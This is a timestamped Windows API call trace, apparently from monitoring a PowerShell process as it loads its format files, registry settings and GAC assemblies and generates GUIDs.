	[0751.921] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xa8e263ee, Data2=0xf0bb, Data3=0x43a8, Data4=([0]=0x86, [1]=0xb3, [2]=0x94, [3]=0x1c, [4]=0xc1, [5]=0xd3, [6]=0x9a, [7]=0x8c))) returned 0x0
	[0751.921] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xdf282e3a, Data2=0x10c2, Data3=0x4913, Data4=([0]=0xa9, [1]=0x50, [2]=0x84, [3]=0x74, [4]=0x27, [5]=0xd7, [6]=0x6d, [7]=0x59))) returned 0x0
	[0751.921] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x7b643021, Data2=0xb3ac, Data3=0x4590, Data4=([0]=0x84, [1]=0xc0, [2]=0x53, [3]=0x3b, [4]=0xe1, [5]=0x97, [6]=0x89, [7]=0x3e))) returned 0x0
	[0751.921] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x7e37223a, Data2=0xa7d8, Data3=0x40f5, Data4=([0]=0x92, [1]=0x33, [2]=0xbd, [3]=0xc6, [4]=0xd0, [5]=0xad, [6]=0x22, [7]=0xd1))) returned 0x0
	[0751.921] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xf570d47f, Data2=0xd1d0, Data3=0x4849, Data4=([0]=0xa6, [1]=0x9e, [2]=0xe6, [3]=0xdf, [4]=0x11, [5]=0xb3, [6]=0x9e, [7]=0x5f))) returned 0x0
	[0751.922] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x9ded4b93, Data2=0xf8a, Data3=0x4756, Data4=([0]=0xb0, [1]=0x43, [2]=0x19, [3]=0x1e, [4]=0xb1, [5]=0xc2, [6]=0xe6, [7]=0xe))) returned 0x0
	[0751.922] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xae361c3b, Data2=0x750f, Data3=0x4df2, Data4=([0]=0x86, [1]=0xcd, [2]=0x9e, [3]=0xa4, [4]=0xb7, [5]=0x67, [6]=0xcb, [7]=0xd9))) returned 0x0
	[0751.922] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x39d60292, Data2=0x3354, Data3=0x41f6, Data4=([0]=0xb8, [1]=0x8e, [2]=0x12, [3]=0x2a, [4]=0xb2, [5]=0xb4, [6]=0xf6, [7]=0xbf))) returned 0x0
	[0751.922] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xb92b9015, Data2=0xbd0, Data3=0x4a70, Data4=([0]=0xab, [1]=0xac, [2]=0xa5, [3]=0xd3, [4]=0x9b, [5]=0x15, [6]=0x8b, [7]=0x47))) returned 0x0
	[0751.922] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xf7cd5fec, Data2=0x7ebe, Data3=0x4920, Data4=([0]=0x97, [1]=0x9d, [2]=0x6b, [3]=0xbe, [4]=0x53, [5]=0x6c, [6]=0x86, [7]=0x76))) returned 0x0
	[0751.922] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xabe3f716, Data2=0x8acf, Data3=0x47da, Data4=([0]=0xab, [1]=0xac, [2]=0x35, [3]=0x48, [4]=0x13, [5]=0x22, [6]=0x7e, [7]=0x64))) returned 0x0
	[0751.922] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x2fd179b, Data2=0x58bd, Data3=0x4189, Data4=([0]=0xba, [1]=0xa4, [2]=0xe6, [3]=0xd7, [4]=0xf6, [5]=0x5e, [6]=0x3c, [7]=0x1c))) returned 0x0
	[0751.922] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x4cc49083, Data2=0x91c4, Data3=0x4ad1, Data4=([0]=0x87, [1]=0x87, [2]=0xb7, [3]=0x66, [4]=0x43, [5]=0xdd, [6]=0x83, [7]=0x56))) returned 0x0
	[0751.922] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x72d184dc, Data2=0x20e8, Data3=0x4bab, Data4=([0]=0xaf, [1]=0x98, [2]=0x0, [3]=0x79, [4]=0xb7, [5]=0x8b, [6]=0xcf, [7]=0x61))) returned 0x0
	[0751.923] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xa207238f, Data2=0x4687, Data3=0x4476, Data4=([0]=0xb4, [1]=0xf8, [2]=0x3f, [3]=0xc3, [4]=0xf8, [5]=0x29, [6]=0x63, [7]=0x42))) returned 0x0
	[0751.923] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xd693de34, Data2=0x8142, Data3=0x46aa, Data4=([0]=0x95, [1]=0x72, [2]=0x96, [3]=0x69, [4]=0xed, [5]=0xda, [6]=0xf6, [7]=0x5e))) returned 0x0
	[0753.383] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x6f942e7d, Data2=0x1258, Data3=0x490d, Data4=([0]=0x87, [1]=0x70, [2]=0x68, [3]=0xd1, [4]=0xba, [5]=0xf7, [6]=0x84, [7]=0x78))) returned 0x0
	[0753.385] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xe2954a1c, Data2=0x2508, Data3=0x4acf, Data4=([0]=0xaa, [1]=0x40, [2]=0xcc, [3]=0xa2, [4]=0xc0, [5]=0xeb, [6]=0x17, [7]=0xbc))) returned 0x0
	[0753.385] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x321acd69, Data2=0x532a, Data3=0x4f91, Data4=([0]=0x8a, [1]=0x30, [2]=0x8, [3]=0xbc, [4]=0xa6, [5]=0x6d, [6]=0xc5, [7]=0x63))) returned 0x0
	[0753.385] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x68f34521, Data2=0xe6c3, Data3=0x473a, Data4=([0]=0xb6, [1]=0x4, [2]=0x78, [3]=0xa4, [4]=0x80, [5]=0xdf, [6]=0x6f, [7]=0x41))) returned 0x0
	[0753.385] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x3e89aeb4, Data2=0x88ea, Data3=0x4137, Data4=([0]=0xb1, [1]=0x1f, [2]=0xa5, [3]=0xcf, [4]=0x60, [5]=0xe, [6]=0xb2, [7]=0x50))) returned 0x0
	[0753.385] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xe08d04c2, Data2=0x6e5c, Data3=0x4a29, Data4=([0]=0xbb, [1]=0x72, [2]=0xa4, [3]=0x2b, [4]=0x80, [5]=0xc2, [6]=0x59, [7]=0xd7))) returned 0x0
	[0753.385] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x2b756210, Data2=0xaab9, Data3=0x4d8a, Data4=([0]=0xb0, [1]=0xb, [2]=0x31, [3]=0xc6, [4]=0x2a, [5]=0xe5, [6]=0x6b, [7]=0x8d))) returned 0x0
	[0753.385] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xfacf2d2a, Data2=0xe3f4, Data3=0x479a, Data4=([0]=0xad, [1]=0xcb, [2]=0xbe, [3]=0xdb, [4]=0x75, [5]=0x5, [6]=0x9e, [7]=0x2c))) returned 0x0
	[0753.386] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x108cb6ae, Data2=0xb174, Data3=0x4f4a, Data4=([0]=0xa4, [1]=0x1f, [2]=0xe, [3]=0xbe, [4]=0x24, [5]=0xa6, [6]=0xe6, [7]=0x11))) returned 0x0
	[0753.386] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x5fa24946, Data2=0xc924, Data3=0x4232, Data4=([0]=0xb2, [1]=0xb8, [2]=0xaf, [3]=0xab, [4]=0xad, [5]=0x50, [6]=0xcd, [7]=0x47))) returned 0x0
	[0753.386] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x2ddaeb90, Data2=0x97f5, Data3=0x4fc2, Data4=([0]=0xb3, [1]=0xcb, [2]=0x63, [3]=0x78, [4]=0x51, [5]=0x9, [6]=0x48, [7]=0xf2))) returned 0x0
	[0753.386] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x596a57b1, Data2=0xbddc, Data3=0x44aa, Data4=([0]=0xbc, [1]=0xdb, [2]=0xf2, [3]=0xbd, [4]=0x59, [5]=0x4d, [6]=0xdb, [7]=0xc6))) returned 0x0
	[0753.386] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x3d1a9d1b, Data2=0x29d5, Data3=0x4d57, Data4=([0]=0x9f, [1]=0x42, [2]=0xfa, [3]=0xac, [4]=0x5, [5]=0x30, [6]=0x9, [7]=0xe9))) returned 0x0
	[0753.386] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xcbd7b5a4, Data2=0x49cf, Data3=0x4599, Data4=([0]=0x9e, [1]=0x65, [2]=0x65, [3]=0xbe, [4]=0xad, [5]=0xc6, [6]=0x2, [7]=0x83))) returned 0x0
	[0753.386] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xc35374b3, Data2=0xc657, Data3=0x4912, Data4=([0]=0xa2, [1]=0x9a, [2]=0xe8, [3]=0x8, [4]=0xf3, [5]=0x49, [6]=0xe4, [7]=0xfc))) returned 0x0
	[0753.387] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x2569c38f, Data2=0x51b3, Data3=0x44f4, Data4=([0]=0x9c, [1]=0x3e, [2]=0x77, [3]=0xc0, [4]=0x89, [5]=0x38, [6]=0x35, [7]=0x57))) returned 0x0
	[0753.387] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0753.387] GetFileType (hFile=0x30c) returned 0x1
	[0753.387] SetErrorMode (uMode=0x1) returned 0x1
	[0753.387] GetFileType (hFile=0x30c) returned 0x1
	[0753.387] ReadFile (in: hFile=0x30c, lpBuffer=0x320de10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x320de10*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0753.388] ReadFile (in: hFile=0x30c, lpBuffer=0x320de10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x320de10*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0753.388] ReadFile (in: hFile=0x30c, lpBuffer=0x320de10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x320de10*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0753.388] ReadFile (in: hFile=0x30c, lpBuffer=0x320de10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x320de10*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0753.389] ReadFile (in: hFile=0x30c, lpBuffer=0x320de10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x320de10*, lpNumberOfBytesRead=0x18d178*=0x8b4, lpOverlapped=0x0) returned 1
	[0753.389] ReadFile (in: hFile=0x30c, lpBuffer=0x320d22c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x320d22c*, lpNumberOfBytesRead=0x18d178*=0x0, lpOverlapped=0x0) returned 1
	[0753.389] ReadFile (in: hFile=0x30c, lpBuffer=0x320de10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x320de10*, lpNumberOfBytesRead=0x18d178*=0x0, lpOverlapped=0x0) returned 1
	[0753.389] CloseHandle (hObject=0x30c) returned 1
	[0753.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0753.389] SetErrorMode (uMode=0x1) returned 0x1
	[0753.389] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d120 | out: lpFileInformation=0x18d120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0753.390] SetErrorMode (uMode=0x1) returned 0x1
	[0753.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0753.407] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d208 | out: phkResult=0x18d208*=0x30c) returned 0x0
	[0753.407] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d18c, lpData=0x0, lpcbData=0x18d188*=0x0 | out: lpType=0x18d18c*=0x1, lpData=0x0, lpcbData=0x18d188*=0x56) returned 0x0
	[0753.407] CoTaskMemAlloc (cb=0x5a) returned 0x1b941920
	[0753.407] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d15c, lpData=0x1b941920, lpcbData=0x18d158*=0x56 | out: lpType=0x18d15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d158*=0x56) returned 0x0
	[0753.407] CoTaskMemFree (pv=0x1b941920) 
	[0753.407] RegCloseKey (hKey=0x30c) returned 0x0
	[0753.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0753.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0753.408] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xc76fe801, Data2=0x8e99, Data3=0x4024, Data4=([0]=0x9d, [1]=0x94, [2]=0xc2, [3]=0x38, [4]=0xfc, [5]=0xbc, [6]=0x73, [7]=0x6e))) returned 0x0
	[0753.408] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xe9129d5d, Data2=0xd8b, Data3=0x4928, Data4=([0]=0x81, [1]=0xe4, [2]=0x9f, [3]=0xde, [4]=0x45, [5]=0xe5, [6]=0xbd, [7]=0x37))) returned 0x0
	[0753.408] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0753.408] GetFileType (hFile=0x30c) returned 0x1
	[0753.409] SetErrorMode (uMode=0x1) returned 0x1
	[0753.409] GetFileType (hFile=0x30c) returned 0x1
	[0753.409] ReadFile (in: hFile=0x30c, lpBuffer=0x2ebb310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x2ebb310*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0753.409] ReadFile (in: hFile=0x30c, lpBuffer=0x2ebb310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x2ebb310*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0753.409] ReadFile (in: hFile=0x30c, lpBuffer=0x2ebb310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x2ebb310*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0753.409] ReadFile (in: hFile=0x30c, lpBuffer=0x2ebb310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x2ebb310*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0753.410] ReadFile (in: hFile=0x30c, lpBuffer=0x2ebb310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x2ebb310*, lpNumberOfBytesRead=0x18d178*=0xe98, lpOverlapped=0x0) returned 1
	[0753.410] ReadFile (in: hFile=0x30c, lpBuffer=0x2eba910, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x2eba910*, lpNumberOfBytesRead=0x18d178*=0x0, lpOverlapped=0x0) returned 1
	[0753.410] ReadFile (in: hFile=0x30c, lpBuffer=0x2ebb310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x2ebb310*, lpNumberOfBytesRead=0x18d178*=0x0, lpOverlapped=0x0) returned 1
	[0753.410] CloseHandle (hObject=0x30c) returned 1
	[0753.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0753.410] SetErrorMode (uMode=0x1) returned 0x1
	[0753.410] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d120 | out: lpFileInformation=0x18d120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0753.411] SetErrorMode (uMode=0x1) returned 0x1
	[0753.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0753.411] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d208 | out: phkResult=0x18d208*=0x30c) returned 0x0
	[0753.411] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d18c, lpData=0x0, lpcbData=0x18d188*=0x0 | out: lpType=0x18d18c*=0x1, lpData=0x0, lpcbData=0x18d188*=0x56) returned 0x0
	[0753.411] CoTaskMemAlloc (cb=0x5a) returned 0x1b941920
	[0753.411] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d15c, lpData=0x1b941920, lpcbData=0x18d158*=0x56 | out: lpType=0x18d15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d158*=0x56) returned 0x0
	[0753.411] CoTaskMemFree (pv=0x1b941920) 
	[0753.411] RegCloseKey (hKey=0x30c) returned 0x0
	[0753.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0753.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0753.412] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x3862ab04, Data2=0xbee3, Data3=0x428d, Data4=([0]=0xb4, [1]=0x83, [2]=0x48, [3]=0x8e, [4]=0xd8, [5]=0x2f, [6]=0x24, [7]=0x2b))) returned 0x0
	[0753.412] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xd1a5af7c, Data2=0x885, Data3=0x431e, Data4=([0]=0x86, [1]=0xc4, [2]=0x72, [3]=0x2b, [4]=0x67, [5]=0x56, [6]=0xae, [7]=0xf8))) returned 0x0
	[0754.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x18d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0754.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x18d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0754.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x18d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0754.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x18d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0754.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0754.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0754.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x18d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0754.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x18d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0754.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0754.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0756.024] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0756.024] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0756.024] CoTaskMemFree (pv=0x1b93b8b0) 
	[0756.025] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0756.025] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0756.026] CoTaskMemFree (pv=0x1b93b8b0) 
	[0756.027] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0756.027] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0756.027] CoTaskMemFree (pv=0x1b93b8b0) 
	[0756.029] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0756.029] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0756.029] CoTaskMemFree (pv=0x1b93b8b0) 
	[0756.036] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0756.036] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0756.036] CoTaskMemFree (pv=0x1b93b8b0) 
	[0756.041] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
